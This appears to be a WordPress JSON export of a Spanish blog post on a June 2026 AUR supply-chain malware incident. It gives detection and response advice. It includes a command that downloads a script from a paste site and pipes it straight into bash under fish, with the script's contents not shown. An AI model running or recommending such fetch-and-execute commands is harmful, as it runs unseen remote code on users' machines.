{"id":5685,"date":"2026-06-13T21:43:14","date_gmt":"2026-06-14T02:43:14","guid":{"rendered":"https:\/\/zidrave.net\/?p=5685"},"modified":"2026-06-13T21:43:14","modified_gmt":"2026-06-14T02:43:14","slug":"despues-del-hackeo-a-arch-linux-que-hacer","status":"publish","type":"post","link":"https:\/\/zidrave.net\/index.php\/2026\/06\/13\/despues-del-hackeo-a-arch-linux-que-hacer\/","title":{"rendered":"Despu\u00e9s del Hackeo a ARCH LINUX, que hacer"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">El ataque a la cadena de suministro de AUR (Junio 2026)<\/h2>\n\n\n\n<p id=\"p-rc_0236e71c1a701fe5-65\">El reciente incidente de seguridad reportado entre el 11 y 12 de junio de 2026 expone una campa\u00f1a coordinada de inyecci\u00f3n de malware que afect\u00f3 a m\u00faltiples paquetes hu\u00e9rfanos o de bajo mantenimiento dentro del repositorio comunitario AUR (Arch User Repository).<sup><\/sup> Los atacantes introdujeron commits maliciosos modificando los archivos de configuraci\u00f3n (aprovechando los bloqueos de dependencias de Node.js, NPM o Bun) para descargar un capturador de credenciales (<em>infostealer<\/em>), un keylogger o un rootkit en los sistemas afectados durante el proceso de instalaci\u00f3n o actualizaci\u00f3n.<sup><\/sup><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"600\" height=\"399\" src=\"https:\/\/zidrave.net\/wp-content\/uploads\/2025\/11\/image-17.png\" alt=\"\" class=\"wp-image-4923\" srcset=\"https:\/\/zidrave.net\/wp-content\/uploads\/2025\/11\/image-17.png 600w, https:\/\/zidrave.net\/wp-content\/uploads\/2025\/11\/image-17-300x200.png 300w\" sizes=\"auto, (max-width: 600px) 100vw, 600px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Impacto real en usuarios de CachyOS<sup><\/sup><\/h3>\n\n\n\n<p id=\"p-rc_0236e71c1a701fe5-66\">Los repositorios oficiales y principales tanto de Arch Linux como de CachyOS est\u00e1n totalmente limpios.<sup><\/sup> Tu sistema operativo solo corre riesgo si realizaste de forma manual alguna instalaci\u00f3n o actualizaci\u00f3n de paquetes espec\u00edficos directamente desde el <strong>AUR<\/strong> (usando herramientas como <code>paru<\/code> o <code>yay<\/code>) o si empleas repositorios automatizados como <code>chaotic-aur<\/code> en las \u00faltimas 72 horas.<sup><\/sup><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">M\u00e9todos para verificar si tu sistema est\u00e1 infectado<\/h2>\n\n\n\n<p id=\"p-rc_0236e71c1a701fe5-67\">La comunidad de desarrolladores ha estructurado m\u00e9todos de diagn\u00f3stico cruzado para comparar tus paquetes locales frente a las bases de datos de elementos comprometidos.<sup><\/sup><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Uso del script de verificaci\u00f3n de la comunidad<sup><\/sup><\/h3>\n\n\n\n<p id=\"p-rc_0236e71c1a701fe5-71\">El equipo de empaquetado ha distribuido un script de diagn\u00f3stico automatizado que rastrea las firmas de instalaci\u00f3n recientes.<sup><\/sup> Debido a la sintaxis nativa de Fish en CachyOS, debes estructurar la ejecuci\u00f3n de la siguiente manera para que procese correctamente la descarga temporal:<sup><\/sup><\/p>\n\n\n\n<p>entra primero en fish y luego ejecuta esto:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>bash &lt;(curl -s https:\/\/cscs.pastes.sh\/raw\/aurvulntest20260611.sh | psub)<\/code><\/pre>\n\n\n\n<p>Si prefieres realizar una auditor\u00eda completa del c\u00f3digo fuente del detector de manera local antes de otorgarle permisos de ejecuci\u00f3n, puedes revisar el repositorio centralizado de control comunitario en GitHub bajo el proyecto <code>lenucksi\/aur-malware-check<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Acciones preventivas y de respuesta<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Congelar actualizaciones externas:<\/strong> Se sugiere suspender por completo las actualizaciones orientadas al repositorio AUR por unos d\u00edas hasta que los administradores revoquen la totalidad de las cuentas comprometidas y limpien el historial de Git.<\/li>\n\n\n\n<li><strong>A\u00f1adir exclusiones de compilaci\u00f3n:<\/strong> Una recomendaci\u00f3n efectiva compartida en las listas de correo consiste en editar el archivo de configuraci\u00f3n <code>\/etc\/pacman.conf<\/code> agregando los entornos de ejecuci\u00f3n que aprovechan estos vectores de inyecci\u00f3n a la l\u00ednea de exclusi\u00f3n voluntaria: <code>IgnorePkg = yarn bun pnpm npm nodejs-nopt node-gyp<\/code><\/li>\n\n\n\n<li><strong>Protocolo ante un positivo:<\/strong> Si los scripts arrojan la existencia de una herramienta vulnerada, el procedimiento seguro ante la presencia de un <em>infostealer<\/em> exige desinstalar inmediatamente el paquete, forzar la rotaci\u00f3n inmediata de todas tus llaves criptogr\u00e1ficas (claves de paso, firmas SSH, tokens de APIs) y proceder a efectuar una reinstalaci\u00f3n limpia del sistema para asegurar que no persistan mecanismos de persistencia ocultos en el almacenamiento local.<\/li>\n<\/ul>\n\n\n\n<p><a target=\"_blank\" rel=\"noreferrer noopener\" href=\"https:\/\/www.youtube.com\/watch?v=kGubIjUVM-E\">Revisi\u00f3n de paquetes maliciosos en el repositorio de usuarios<\/a><\/p>\n\n\n\n<p>Este video analiza los riesgos estructurales de la cadena de suministro en el AUR y detalla c\u00f3mo ciertos scripts de instalaci\u00f3n pueden ser manipulados para ejecutar software no deseado.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>El ataque a la cadena de suministro de AUR (Junio<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3193,8153],"tags":[11229,15607,12239,10956,15603,15604,2537,15605,12545,15601,15602,8469,1408,188,11235,11274,15606,6283,4447,17,15467,3431,1708,11277],"class_list":["post-5685","post","type-post","status-publish","format-standard","hentry","category-linux","category-viral","tag-archlinux","tag-auditoria-2","tag-aur","tag-cachyos","tag-commits","tag-hashes","tag-herramientas","tag-infeccion-2","tag-informatica-2","tag-infostealer","tag-inyeccion","tag-limpieza","tag-linux","tag-malware","tag-pacman","tag-paru","tag-proteccion-2","tag-repositorio","tag-script","tag-seguridad","tag-sysadmin","tag-terminal","tag-vulnerabilidad","tag-yay"],"_links":{"self":[{"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/posts\/5685","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/comments?post=5685"}],"version-history":[{"count":1,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/posts\/5685\/revisions"}],"predecessor-version":[{"id":5686,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/posts\/5685\/revisions\/5686"}],"wp:attachment":[{"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/media?parent=5685"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/categories?post=5685"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zidrave.net\/index.php\/wp-json\/wp\/v2\/tags?post=5685"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}